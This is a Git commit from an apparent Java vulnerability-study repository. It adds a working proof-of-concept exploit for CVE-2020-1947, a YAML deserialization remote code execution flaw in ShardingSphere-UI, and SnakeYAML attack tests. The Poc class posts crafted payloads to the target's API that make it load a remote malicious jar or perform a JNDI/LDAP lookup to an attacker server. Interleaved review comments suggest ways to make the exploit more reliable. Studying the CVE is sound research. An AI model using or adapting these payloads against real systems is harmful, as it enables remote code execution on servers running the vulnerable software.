Commit eadf7bb

author
“threedr3am”
committed
1 parent 6d89b02 commit eadf7bb

7 files changed

+240
-1
lines changed

Lines changed: 17 additions & 0 deletions
@@ -0,0 +1,17 @@
1+
### *ShardingSphere-UI YAML反序列化*
2+
3+
CVE-2020-1947
4+
5+
#### 二进制运行
6+
- git clone https://github.com/apache/incubator-shardingsphere.git;
7+
- 运行 mvn clean install -Prelease;
8+
- 获取安装包 /sharding-distribution/shardingsphere-ui-distribution/target/apache-shardingsphere-incubating-${latest.release.version}-sharding-ui-bin.tar.gz;
9+
- 解压缩后运行bin/start.sh;
10+
- 访问http://localhost:8088/。
11+
12+
```
13+
server.port=8088
14+
15+
user.admin.username=admin
16+
user.admin.password=admin
17+
```
Lines changed: 21 additions & 0 deletions
@@ -0,0 +1,21 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<parent>
6+
<artifactId>ShardingSphere-UI</artifactId>
7+
<groupId>com.xyh</groupId>
8+
<version>1.0-SNAPSHOT</version>
9+
</parent>
10+
<modelVersion>4.0.0</modelVersion>
11+
12+
<artifactId>CVE-2020-1947</artifactId>
13+
14+
<dependencies>
15+
<dependency>
16+
<groupId>com.xyh</groupId>
17+
<artifactId>common</artifactId>
18+
<version>1.0-SNAPSHOT</version>
19+
</dependency>
20+
</dependencies>
21+
</project>
Lines changed: 162 additions & 0 deletions
@@ -0,0 +1,162 @@
1+
package com.threedr3am.bug.shardingsphere.ui;
2+
3+
import com.threedr3am.bug.common.server.LdapServer;
4+
import java.io.UnsupportedEncodingException;
5+
import java.util.Random;
6+
import java.util.concurrent.Executors;
7+
import org.apache.http.HttpEntity;
8+
import org.apache.http.client.methods.CloseableHttpResponse;
9+
import org.apache.http.client.methods.HttpPost;
10+
import org.apache.http.entity.StringEntity;
11+
import org.apache.http.impl.client.CloseableHttpClient;
12+
import org.apache.http.impl.client.HttpClientBuilder;
13+
import org.apache.http.impl.client.HttpClients;
14+
15+
16+
/**
17+
* @author threedr3am
18+
*/
19+
public class Poc {
20+
21+
public static void main(String[] args) throws UnsupportedEncodingException, InterruptedException {
22+
String target = "http://localhost:8088";
23+
String accessToken = "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";
24+
String zookeeperURL = "127.0.0.1:2181";
25+
26+
initData(target, accessToken, zookeeperURL);
27+
28+
//todo payload-1:恶意jar包 payload,参考 common这个module 的CalcScriptEngineFactory类,以及其SPI注册文件META-INF/services/javax.script.ScriptEngineFactory
29+
String evilJar = "http://127.0.0.1:80/common-1.0-SNAPSHOT.jar";
30+
attack(target, accessToken, evilJar);
31+
32+
//todo payload-2:使用jndi注入 payload
33+
String evilLdapServer = "ldap://127.0.0.1:43658/Calc";
34+
// Executors.newSingleThreadExecutor().execute(() -> LdapServer.run());
35+
// Thread.sleep(3000L);
36+
// attack2(target, accessToken, evilLdapServer);
37+
}
38+
39+
private static void attack(String target, String accessToken, String evilJar)
40+
throws UnsupportedEncodingException {
41+
String payload;
42+
HttpPost httpPost;
43+
HttpEntity httpEntity;
44+
45+
//todo 添加scheme,反序列化RCE
46+
payload = "'111': !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['" + evilJar + "']]]]";
47+
payload = "{\"name\":\"CVE-2020-1947(" + new Random().nextInt(10000) + ")\",\"ruleConfiguration\":\"name: 111\\nmasterDataSourceName: 222\\nloadBalanceAlgorithmType: 333\\nslaveDataSourceNames: [111,222]\",\"dataSourceConfiguration\":\"" + payload + "\"}";
48+
httpPost = new HttpPost(target + "/api/schema");
49+
httpPost.addHeader("Access-Token", accessToken);
50+
httpEntity = new StringEntity(payload, "application/json", "utf-8");
51+
httpPost.setEntity(httpEntity);
52+
try {
53+
HttpClientBuilder httpClientBuilder = HttpClients
54+
.custom()
55+
.disableCookieManagement()
56+
.disableAuthCaching()
57+
.disableRedirectHandling()
58+
;
59+
CloseableHttpClient httpClient = null;
60+
CloseableHttpResponse response = null;
61+
try {
62+
httpClient = httpClientBuilder.build();
63+
response = httpClient.execute(httpPost);
64+
} finally {
65+
response.close();
66+
httpClient.close();
67+
}
68+
} catch (Exception e) {
69+
e.printStackTrace();
70+
}
71+
}
72+
73+
private static void attack2(String target, String accessToken, String evilLdapServer)
74+
throws UnsupportedEncodingException {
75+
String payload;
76+
HttpPost httpPost;
77+
HttpEntity httpEntity;
78+
79+
//todo 添加scheme,反序列化RCE
80+
payload = "!!com.sun.rowset.JdbcRowSetImpl\\n dataSourceName: " + evilLdapServer + "\\n autoCommit: true";
81+
payload = "{\"name\":\"CVE-2020-1947(" + new Random().nextInt(10000) + ")\",\"ruleConfiguration\":\"name: 111\\nmasterDataSourceName: 222\\nloadBalanceAlgorithmType: 333\\nslaveDataSourceNames: [111,222]\",\"dataSourceConfiguration\":\"" + payload + "\"}";
82+
httpPost = new HttpPost(target + "/api/schema");
83+
httpPost.addHeader("Access-Token", accessToken);
84+
httpEntity = new StringEntity(payload, "application/json", "utf-8");
85+
httpPost.setEntity(httpEntity);
86+
try {
87+
HttpClientBuilder httpClientBuilder = HttpClients
88+
.custom()
89+
.disableCookieManagement()
90+
.disableAuthCaching()
91+
.disableRedirectHandling()
92+
;
93+
CloseableHttpClient httpClient = null;
94+
CloseableHttpResponse response = null;
95+
try {
96+
httpClient = httpClientBuilder.build();
97+
response = httpClient.execute(httpPost);
98+
} finally {
99+
response.close();
100+
httpClient.close();
101+
}
102+
} catch (Exception e) {
103+
e.printStackTrace();
104+
}
105+
}
106+
107+
private static void initData(String target, String accessToken, String zookeeperURL)
108+
throws UnsupportedEncodingException, InterruptedException {
109+
String name = String.valueOf(new Random().nextInt(10000));
110+
//todo 创建注册中心
111+
String payload = "{\"digest\":\"\",\"name\":\"CVE-2020-1947(" + name + ")\",\"namespace\":\"threedr3am\",\"orchestrationName\":\"threedr3am\",\"registryCenterType\":\"Zookeeper\",\"serverLists\":\"" + zookeeperURL + "\"}";
112+
HttpPost httpPost = new HttpPost(target + "/api/reg-center");
113+
httpPost.addHeader("Access-Token", accessToken);
114+
HttpEntity httpEntity = new StringEntity(payload, "application/json", "utf-8");
115+
httpPost.setEntity(httpEntity);
116+
try {
117+
HttpClientBuilder httpClientBuilder = HttpClients
118+
.custom()
119+
.disableAuthCaching()
120+
.disableCookieManagement()
121+
.disableRedirectHandling()
122+
;
123+
CloseableHttpClient httpClient = null;
124+
CloseableHttpResponse response = null;
125+
try {
126+
httpClient = httpClientBuilder.build();
127+
response = httpClient.execute(httpPost);
128+
} finally {
129+
response.close();
130+
httpClient.close();
131+
}
132+
} catch (Exception e) {
133+
e.printStackTrace();
134+
}
135+
136+
//todo 连接注册中心
137+
payload = "{\"name\":\"CVE-2020-1947(" + name + ")\"}";
138+
httpPost = new HttpPost(target + "/api/reg-center/connect");
139+
httpPost.addHeader("Access-Token", accessToken);
140+
httpEntity = new StringEntity(payload, "application/json", "utf-8");
141+
httpPost.setEntity(httpEntity);
142+
try {
143+
HttpClientBuilder httpClientBuilder = HttpClients
144+
.custom()
145+
.disableAuthCaching()
146+
.disableCookieManagement()
147+
.disableRedirectHandling()
148+
;
149+
CloseableHttpClient httpClient = null;
150+
CloseableHttpResponse response = null;
151+
try {
152+
httpClient = httpClientBuilder.build();
153+
response = httpClient.execute(httpPost);
154+
} finally {
155+
response.close();
156+
httpClient.close();
157+
}
158+
} catch (Exception e) {
159+
e.printStackTrace();
160+
}
161+
}
162+
}
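Review bot: In attack, attack2 and initData the inner `finally { response.close(); httpClient.close(); }` runs with `response` still null whenever `httpClient.execute(httpPost)` throws (target down, refused connection), so the NullPointerException from the finally block is what the outer catch prints and the real failure is lost. The status line is also never inspected, so a rejected request on `/api/reg-center` or `/api/schema` (for example a 401 when the hard-coded Access-Token is stale) is indistinguishable from a successful injection, and initData's failure would silently invalidate the attack that follows it. Since the same build/post/close block is pasted three times, I would fold it into one helper using try-with-resources that prints the status, and call it as `post(target, "/api/schema", accessToken, payload)` from each site. The JdbcRowSetImpl/LDAP variant in attack2 presumably depends on the target JDK still allowing remote LDAP codebase loading; a one-line comment next to `evilLdapServer` saying so would explain why the jar-based payload is the default.
```java
private static void post(String target, String path, String accessToken, String json)
    throws UnsupportedEncodingException {
  HttpPost httpPost = new HttpPost(target + path);
  httpPost.addHeader("Access-Token", accessToken);
  httpPost.setEntity(new StringEntity(json, "application/json", "utf-8"));
  HttpClientBuilder builder = HttpClients.custom()
      .disableCookieManagement()
      .disableAuthCaching()
      .disableRedirectHandling();
  // try-with-resources: no NPE on a null response, and execute()'s own exception is the one reported
  try (CloseableHttpClient httpClient = builder.build();
       CloseableHttpResponse response = httpClient.execute(httpPost)) {
    System.out.println(path + " -> " + response.getStatusLine());
  } catch (Exception e) {
    e.printStackTrace();
  }
}
// … unchanged: payload construction in attack / attack2 / initData, each now ending in post(...) …
```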

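--- /dev/null
+++ b/ShardingSphere-UI/pom.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<parent>
+<artifactId>learn-java-bug</artifactId>
+<groupId>com.xyh</groupId>
+<version>1.0-SNAPSHOT</version>
+</parent>
+<modelVersion>4.0.0</modelVersion>
+
+<artifactId>ShardingSphere-UI</artifactId>
+<packaging>pom</packaging>
+<modules>
+<module>CVE-2020-1947</module>
+</modules>
+
+
+</project>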

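--- a/pom.xml
+++ b/pom.xml
@@ -21,6 +21,7 @@
 <module>tomcat</module>
 <module>spring</module>
 <module>cas</module>
+<module>ShardingSphere-UI</module>
 </modules>
 
 <name>learn-java-bug</name>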

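--- a/spring/spring-boot-actuator-bug/pom.xml
+++ b/spring/spring-boot-actuator-bug/pom.xml
@@ -17,5 +17,11 @@
 <artifactId>snakeyaml</artifactId>
 <version>1.16</version>
 </dependency>
+
+<dependency>
+<groupId>com.xyh</groupId>
+<artifactId>common</artifactId>
+<version>1.0-SNAPSHOT</version>
+</dependency>
 </dependencies>
 </project>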

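--- a/spring/spring-boot-actuator-bug/src/main/java/com/threedr3am/bug/spring/actuator/snakeyaml/SnakeYamlTest.java
+++ b/spring/spring-boot-actuator-bug/src/main/java/com/threedr3am/bug/spring/actuator/snakeyaml/SnakeYamlTest.java
@@ -1,5 +1,8 @@
 package com.threedr3am.bug.spring.actuator.snakeyaml;
 
+import com.threedr3am.bug.common.server.LdapServer;
+import java.util.HashMap;
+import java.util.Map;
 import org.yaml.snakeyaml.Yaml;
 
 /**
@@ -10,16 +13,26 @@ public class SnakeYamlTest {
 public static void main(String[] args) {
 testNewInstance();
 testAttack();
+testAttack2();
 }
 
 public static void testNewInstance() {
 Yaml yaml = new Yaml();
+Map<Object, Object> map = new HashMap<>();
+map.put("111", new A("xxx"));
+System.out.println(yaml.dump(map));;
 yaml.load("!!com.threedr3am.bug.spring.actuator.snakeyaml.A [\"threedr3am\"]");
 }
 
 public static void testAttack() {
 Yaml yaml = new Yaml();
-yaml.load("!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:80/common-1.0-SNAPSHOT.jar\"]]]]");
+yaml.load("'111': !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['http://127.0.0.1:80/common-1.0-SNAPSHOT.jar']]]]");
+}
+
+public static void testAttack2() {
+new Thread(() -> LdapServer.run()).start();
+Yaml yaml = new Yaml();
+yaml.load("!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: ldap://127.0.0.1:43658/Calc\n autoCommit: true");
 }
 
 }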
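Review bot: testAttack2 starts LdapServer on a fresh thread and immediately calls `yaml.load(...)`, so the JNDI lookup to 127.0.0.1:43658 races the listener's bind and can be refused on a cold start; the Poc added in this same commit sleeps 3s before its attack2 for exactly this reason. Rather than a fixed sleep, poll the port until it accepts a connection before loading, as below. The lambda can be the method reference `LdapServer::run`, and if LdapServer.run() blocks the thread should be a daemon so the JVM can exit once load returns. Minor: `System.out.println(yaml.dump(map));;` in testNewInstance has a stray `;`.
```java
public static void testAttack2() {
  Thread ldap = new Thread(LdapServer::run, "ldap-server");
  ldap.setDaemon(true);
  ldap.start();
  // wait for the listener instead of racing its bind; give up after ~5s
  for (int i = 0; i < 50; i++) {
    try (java.net.Socket probe = new java.net.Socket("127.0.0.1", 43658)) {
      break;
    } catch (java.io.IOException notYet) {
      try { Thread.sleep(100L); } catch (InterruptedException e) { Thread.currentThread().interrupt(); return; }
    }
  }
  // … unchanged: new Yaml() and the JdbcRowSetImpl load …
}
```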
